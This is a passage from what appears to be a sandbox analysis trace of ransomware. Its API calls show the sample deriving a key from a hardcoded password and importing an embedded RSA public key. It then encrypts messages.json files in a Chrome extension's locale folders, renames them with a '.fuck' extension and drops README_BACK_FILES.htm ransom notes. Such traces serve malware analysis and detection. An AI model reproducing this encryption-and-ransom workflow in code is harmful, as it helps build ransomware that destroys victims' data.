lpOverlapped=0x0) returned 1 [0252.434] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.434] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.434] CloseHandle (hObject=0x5d64) returned 1 [0252.434] CloseHandle (hObject=0x5d5c) returned 1 [0252.434] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0252.438] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0252.438] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.gsg")) returned 1 [0252.439] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.fuck")) returned 1 [0252.440] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.440] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.440] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.440] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.440] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.440] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0252.441] AreFileApisANSI () returned 1 [0252.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.441] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.441] GetFileType (hFile=0x5d60) returned 0x1 [0252.441] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.442] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.442] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.442] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.443] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.443] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.443] GetLastError () returned 0x0 [0252.443] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json")) returned 0x20 [0252.443] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0252.443] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.444] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.445] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.445] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.447] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.447] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.447] CryptHashData (hHash=0x29846a0, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.447] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984760) returned 1 [0252.447] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.447] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.448] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c350) returned 1 [0252.448] CryptImportPublicKeyInfo (in: hCryptProv=0x298c350, dwCertEncodingType=0x1, pInfo=0x29944b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29944e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29944e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984d60) returned 1 [0252.448] CryptEncrypt (in: hKey=0x2984d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.448] CryptEncrypt (in: hKey=0x2984d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298c3d8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298c3d8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.448] WriteFile (in: hFile=0x5d64, lpBuffer=0x298c3d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298c3d8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.449] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.450] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.450] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.450] CloseHandle (hObject=0x5d5c) returned 1 [0252.451] CloseHandle (hObject=0x5d64) returned 1 [0252.451] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0252.454] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0252.454] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0252.455] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0252.456] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.456] CryptDestroyKey (hKey=0x2984760) returned 1 [0252.456] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.456] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.456] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.457] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0252.457] AreFileApisANSI () returned 1 [0252.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.457] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.457] GetFileType (hFile=0x5d60) returned 0x1 [0252.457] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.458] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.458] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.459] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.459] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.459] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.459] GetLastError () returned 0x0 [0252.459] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json")) returned 0x20 [0252.460] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0252.460] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.460] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.461] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.462] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.464] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.464] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.464] CryptHashData (hHash=0x29846a0, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.464] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.464] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.464] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.464] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b580) returned 1 [0252.465] CryptImportPublicKeyInfo (in: hCryptProv=0x298b580, dwCertEncodingType=0x1, pInfo=0x2993130*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993160*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993168*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984de0) returned 1 [0252.465] CryptEncrypt (in: hKey=0x2984de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.465] CryptEncrypt (in: hKey=0x2984de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298c4e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298c4e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.465] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298c4e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298c4e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.466] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.467] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.467] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.467] CloseHandle (hObject=0x5d64) returned 1 [0252.467] CloseHandle (hObject=0x5d5c) returned 1 [0252.467] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0252.470] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0252.471] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0252.472] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0252.473] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.473] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.473] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.473] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.473] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.474] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 